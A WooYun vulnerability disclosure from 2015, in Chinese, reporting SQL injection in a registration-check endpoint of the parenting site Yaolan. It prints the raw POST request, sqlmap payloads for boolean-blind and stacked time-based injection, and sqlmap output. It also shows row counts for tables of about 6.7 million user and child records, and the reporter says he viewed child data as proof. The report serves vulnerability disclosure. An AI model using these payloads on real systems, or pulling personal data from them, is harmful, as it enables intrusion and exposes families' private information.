当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118715

漏洞标题:摇篮网某处SQL注入(上大量的母婴信息侧漏)

相关厂商:摇篮网

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-06-07 21:52

修复时间:2015-07-23 17:22

公开时间:2015-07-23 17:22

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-07: 细节已通知厂商并且等待厂商处理中
2015-06-08: 厂商已经确认,细节仅向厂商公开
2015-06-18: 细节向核心白帽子及相关领域专家公开
2015-06-28: 细节向普通白帽子公开
2015-07-08: 细节向实习白帽子公开
2015-07-23: 细节向公众公开

简要描述:

【HD】 以团队之名 以个人之荣耀 共建网络安全
-------------------------------------------------
能上首页不?

详细说明:

下面为本次测试的详细内容
POST数据包:

POST /AjaxValidate.aspx HTTP/1.1
Host: user.yaolan.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://user.yaolan.com/RegisterC.aspx?desc=&back_url=http%3a%2f%2fjifen.yaolan.com%2f&immediately=False
Content-Length: 21
Cookie: __yl__test__cookies=1433598576400; _yl_ct=1433598576401; _yl_fr=4; _yl_utmb=1433598446840; _yl_utma=1433598446837.1433598446840; _yl_ft=1433598446836; _yl_nvid=ab316044bfbd5f5e4994d115bc55d823; _yl_pageid=AFfq22,RJrqqu,A7RjMr; Hm_lvt_04a8007d069875ec6d7ac710d65c2b92=1433598448; Hm_lpvt_04a8007d069875ec6d7ac710d65c2b92=1433598577; login_bg_num=1; base_domain_c454868876824458837735f572c90c75=yaolan.com; stay_bg=1; ASP.NET_SessionId=hi5hacmbagucv2ysmqlpymjx; theme=c; __CT_Data=gpv=1&apv_4579_www03=1&cpv_4579_www03=1; WRUID=708976282.1226983508; WRIgnore=true; xnsetting_c454868876824458837735f572c90c75=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22shareAuth%22%3Anull%7D
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
type=1&name=wooyun999


name 参数未过滤 可注入 2库 (具体参数见下图 以及漏洞证明)

0.png


两个库我都看了下数据量 information_schema 里的数据量不大 但是 user_yaolan_com 里的数据量 大大滴的啊

2.png


Database: user_yaolan_com
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| LoginInfo | 6740391 |
| ChildInfo | 6740373 |
| UserBaseInfo | 6740285 |
| UserExtInfo | 6740162 |
| MarkInfo | 6739086 |
| iur_child_birth_based | 5483060 |
| UserInterestInfo | 1021602 |
| UserSource | 1006414 |
| ChildInterestInfo | 496016 |
| CoinInfo | 444240 |
| NoDefaultChildInfo | 258726 |
| UserSignature | 81646 |
| BoroughList | 2870 |
| word_filter_reg | 2809 |
| CityList | 341 |
| CountryList | 243 |
| UserVerifyDetail | 136 |
| UserInterestDetailList | 107 |
| UserGeekDetail | 48 |
| ChildInterestDetailList | 40 |
| UserInterestList | 40 |
| ProvinceList | 35 |
| ChildInterestList | 22 |
| TradeList | 17 |
| GradeList | 16 |
| ProfessionList | 12 |
| IncomeList | 8 |
| EducationList | 5 |
| GeekList | 4 |
| VerifyList | 1 |
+-------------------------+---------+


ChildInfo 表内容(证明数据量需要 见谅)

3.png


4.png


其他表就不深入了

漏洞证明:

POST parameter 'name' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] n
sqlmap identified the following injection points with a total of 270 HTTP(s) req
uests:
---
Parameter: name (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=1&name=wooyun999' AND 7721=7721 AND 'VdGz'='VdGz
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: type=1&name=wooyun999';(SELECT * FROM (SELECT(SLEEP(5)))wPGn)#
---
[22:19:20] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0.11
[22:19:20] [INFO] fetching database names
[22:19:20] [INFO] fetching number of databases
[22:19:20] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[22:19:20] [INFO] retrieved: 2
[22:19:21] [INFO] retrieved: information_schema
[22:19:54] [INFO] retrieved: use
[22:20:27] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
going to retry the request
r_yaolan_com
available databases [2]:
[*] information_schema
[*] user_yaolan_com
[22:20:44] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\user.yaolan.com'
[*] shutting down at 22:20:44

修复方案:

良心厂商 上百万的数据 有礼物不?

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-08 17:20

厂商回复:

漏洞确认,正在修复。感谢乌云白帽子提醒。

最新状态:

暂无